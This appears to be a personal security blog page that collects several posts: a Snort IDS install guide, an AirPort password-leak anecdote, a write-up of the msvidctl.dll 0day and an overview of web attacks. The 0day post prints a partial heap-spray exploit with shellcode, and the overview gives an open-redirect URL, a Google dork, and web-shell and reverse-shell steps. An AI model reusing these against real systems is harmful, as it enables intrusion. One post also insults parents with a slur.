nodereality

Earlier this month, MySpace got sued by several parents, who claimed that MySpace is somehow responsible because their kids got sexually assaulted by people they met on the web (Myspace).

There have been quite a few similar situations in the past; apparently, some totally retarded parents think that it's MySpace's or example.com's job to parent their kids.

Doing an analogy means that you should sue some detergent company because your kid ate 2 Kg of detergent and died. It's their job to parent your kids, right?

The fact that those kids got assaulted is regrettable, but the only ones to blame are the parents.

Obviously, social networks present a risk for minors, but so does, for example, crossing a highway, at night, while being 13 years old.

Sure, example.com needs to aid authorities in bringing the perpetrators to justice by providing information, should something like this happen, but it can't do any real prevention. That's the parent's job, and always will be.

You can read more in this PDF, and in Reuter's coverage of the story.

This is a tutorial based on my experience with installing Snort IDS with the BASE system to view, dissect and graph alerts. This is a very straightforward install thanks to FreeBSD's ports system. If you choose another operating system like Linux, note that you probably will have to install from source because the package management systems like aptitude are severely out of date.

Let's begin!

# Locate Snort in the FreeBSD ports tree and cd into that directory:
cd /usr/ports/security/snort
# Change to the root user and install
sudo make install clean

It will ask you a few questions in a ncurses interface, choose the database you will be using. I choose MySQL because it is already installed, but I recommend PostgreSQL for its speed and ease of use.

When it finishes compiling we need to install oinkmaster. Oinkmaster is a port that will get the latest signatures from snort.org. Configuration instructions for this are followed after we install.

#Locate oinkmaster and cd into its directory
cd /usr/ports/security/oinkmaster
# Change to root user and install
sudo make install clean

Now you need to goto snort.org and register in order to receive the latest snort definitions. You will receive a hash which you'll place in your configuration file. Save this hash. It's time to setup the configuration file for oinkmaster and then run it to receive over 500MB of definitions.

# change the name of oinkmaster.conf.sample to oinkmaster.conf
mv /usr/local/etc/oinkmaster.conf.sample /usr/local/etc/oinkmaster.conf
# open this up with your favorite editor
ee /usr/local/etc/oinkmaster.conf

Inside this configuration you need to look for this line: Example for Snort-Current.

Change the to the hash you saved earlier (replacing the < , > symbols as well).

Now the next part which I ran into trouble with was that when we run oinkmaster like:

oinkmaster -o /usr/local/etc/snort/rules

I realized that there was not enough space in my /tmp directory.

[root@mysystem ~]$ df
Filesystem  1K-blocks    Used     Avail Capacity  Mounted on
/dev/ad2s1a    507630  220226    246794    47%    /
devfs               1       1         0   100%    /dev
/dev/ad2s1e    507630     164    466856     0%    /tmp
/dev/ad2s1f 146367154 9481038 125176744     7%    /usr
/dev/ad2s1d   1998574 1489084    349606    81%    /var

So I changed the directory where oinkmaster saves the tar.gz to another directory that was in a larger partition.

# change the directory if your /tmp partition is under 500MB
tmpdir = /home/someuser/snort/

Now that oinkmaster has enough room to download and extract the tarball we can run our command again:

oinkmaster -o /usr/local/etc/snort/rules

Our rules are up to date, now we need to setup a database so that Snort can save alerts and BASE can display them on the web.

# login as root to MySQL, create a database and user for snort
mysql -u root -p
CREATE DATABASE `snort`;
GRANT ALL PRIVILEGES ON snort.* to 'snort'@'localhost' IDENTIFIED by 'somepasswordhere';

Now we setup our database with tables and the appropriate data with a script that was included in the port.

#login to MySQL as the snort user and direct all the data from create_mysql into the database
mysql -u snort -p snort < usr/local/share/examples/snort/create_mysql</code>

There are a few more things to do to make snort work. We first have to edit the snort.conf so that it knows about our database. We also have to add snort to our startup options (rc.conf).

#open up snort.conf and optimize and configure some settings (make sure your db settings are correct)
ee /usr/local/etc/snort/snort.conf</code>
#uncomment the following lines (and configure):
# config detection: search-method lowmem
# output alert_syslog: LOG_AUTH LOG_ALERT
# output database: log, mysql, user=snort password=mysnortpassword dbname=snort host=localhost

Also make sure to uncomment all the include $RULE_PATH lines, or if you want, only uncomment the ones you wish to monitor, which will increase speed but decrease definitions to check for.

Enable snort in rc.conf:

sudo ee /etc/rc.conf    # and adding snort_enable=”YES”</code>

Let's install BASE now:

cd /usr/ports/databases/adobd; sudo make install clean
cd /usr/ports/security/base; sudo make install clean

Setup apache to point to the directory base is installed in and restart apache.

#start snort
sudo /usr/local/etc/rc.d/snort start

Login to your BASE site and follow the instructions and now your IDS system is installed.

Using Snort with BASE:

This is the BASE main screen on my server. It give the user an easy to use interface to view different alerts.

I find it best to view the unique alerts on this main screen and check the details of those packet captures.

Here is a display of the unique alerts. It shows the total amount of times that specific alert was triggered. You can open up a specific incident and view the pcap file in many different formats.

Here is a payload of the MSSQL Slammer worm. It is the most active alert on my server, however it poses no threat to me because I do not run Windows.

There is even graphing functions:

It is useful to know about what is going on in your network and Snort is an excellent tool to assist with this. However, Snort IDS will not stop attacks, it only displays what has happened. There are other tools to actually stop attacks, like Snort-Inline (modes such as PRM or packet replace mode, change the data so it becomes useless).

You need to supplement your server with PF (packet filtering) in order to maintain a good degree of security. If you notice, there has been no alerts of port scanning. My PF configuration stops this kind of activity completely.

Other tools to increase your awareness of an incident on FreeBSD would be to install TripWire which shows what files were modified, created or deleted on your system. Also some configuration changes like putting your OpenSSH server on a higher port so bots do not brute force it. With some scripts and IPTables you can blacklist certain IP's from repeated brute force attempts against your server. You should also always use a remote logging system because it is very easy for the attacker to clean the logs once the attacker has root access to your server.

This is something little I found by chance, its not the most major of security holes but hey I get a plaintext password. You should never be able to get a password in plaintext... just defeats the point, right?

Let me explain a little in to how this happened. I already have a Time Capsule device from Apple, this is a network storage device but also provides routing, network address translation and wifi. However, it lacks the AirTunes option that the AirPort Express device offers.

AirTunes allows you to stream music over wireless to the speaker connected to the AirPort Express device. But because this device also has the other feature of the Time Capsule without the network storage I couldn't justify to myself buying a new AirPort Express and I got a used one from eBay.

All is well, and I get my package in the post a few days after buying. I plug it in and open the AirPort Utility to configure the device to my needs.

Problem! The device is asking for a password... Well ok I must be able to factory reset this unit and a quick google brings me to this support article. It tells me I should do a soft reset if I forget the password. This gives you 5 minutes to change any setting on the device without a password including the password itself.

I do a soft reset and open the configuration on the device... something I notice is the password field has some masked letters in, but something that appeals to me more is the option to save the password in my keychain. So, I check this option and change a different setting on the AirPort Express (e.g. device name) so the save button will be enabled.

After saving I check my keychain, and what a shock the password that the old owner of this AirPort Express is there to me in plain text.

As you probably know, it's a Windows 0day against msvidctl.dll. Some chinese sites have been using drive-by attacks with it for the past 3 days or so.

Microsoft has an advisory, as well as a blog post.

The idea is that setting the killbit on the dll will prevent the attack (.reg file):

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}] 
"Compatibility Flags"=dword:00000400

You can find variations of the snippet according to CSIS (who supposedly discovered the exploit) all over the web:

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805
%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
 + [SNIP]);
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=sh uishiMVP+sh uishiMVP+bZmybr; memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

For those of you who want to do further testing, there is a metasploit module available, as well as a quick script to generate the gif file directly.

For reference, here are CVE and OSVDB links.

Years ago it was simple enough to scan a network, find vulnerable servers and go to web sites like packetstormsecurity.org to acquire remote exploits and then launch them against the target. Times are changing now and attackers are going after web applications more frequently. SQL injections, XSS exploits and RFI's are somewhat the norm now and easiest to exploit. The above security problems are becoming the easiest way into a system. There are countless web applications written by amateur coders and even homemade ones that have never been audited thoroughly. These applications contain various risks for the providers.

Looking into the archives of some of the exploits available for a popular CMS (Content Management System) called Joomla the total count of exploits for that web application is above 90. I usually see about 2 Joomla SQL injection (or blind SQL injections) per week. Surprising? It used to be, but you get used to it after a while. The problem seems to be based on coders not thinking about the security implications when they design and write programs.

Let's focus on three major problems in web application security. As mentioned before, these include SQL injections, XSS (cross site scripting), and RFI (remote file inclusions).

SQL injections exploit various database servers by entering data that should be sanitized by the coder before being launched. An attacker can acquire information from the database, even add new information to it. An interesting example I've seen is when code is injected into the log files of the server and the administrator opens the log, the malicious code is executed.

XSS or cross site scripting is really increasing in popularity and many large 'secure' sites have been attacked with this. Usually a link that contains an embedded link to a malicious web page is constructed. When the user clicks on it, another web page is loaded through an iframe or other means. The attacker can then record the session using a Javascript to PHP keylogger or redirection to acquire an account username and password. Some companies are even so sure that their applications are secure they offer money to hack them (http://www.itworld.com/security/68962/web-mail-company-pay-prize-after-ceo-hacked).

For a demonstration of XSS, look at this URL: http://www.eatsmart.org/external/default.asp?URL=http://www.amitbhawani.com/blog/Images/W/Website-Hacking-XSS-Report.gif

It contains default.asp?URL=. This input is not sanitized and an attacker can put the address of a Drive-By-Exploit generated by something like Active eXploit for that URL. For demonstration, the above URL is not malicious and only contains the URL of an image showing a graph of web exploits. These exploits, combined with the power of Google hacking are random and are done in mass scale. Try it, Google: inurl:default.asp?URL= and see for yourself.

RFI's or remote file inclusions are another way to acquire and maintain access to the compromised host. These come in the form of exploiting a web application, for example a file upload mechanism. Once the flaw is found, the attacker uploads a PHP shell like r57 in order to have full control of the system as the web servers user (usually www-data or www). Often this is a stepping stone to run a remote connect back C or Perl program where the attacker listens on his local machine with something like Netcat and receives a shell shuffled back from the server. He or she then proceeds to further attacks like privilege escalation exploits and other misconfigured applications, ultimately gaining root or information.

If you follow the daily news or mailing lists such as full disclosure, you'll notice that the majority of these attacks are based on the above security issues. If you want to learn more about these attacks and try them yourself, in my opinion the only way to really understand them, then goto this site: http://www.hackthissite.org/ and play the game where you will learn how to hack web applications legally. You'll learn an awful lot about how to write secure code for web applications and what mistakes to avoid.

For further reading check out the Web Application Hackers Handbook. It's a dense bible of web application attacks and ways to secure your system from these attacks.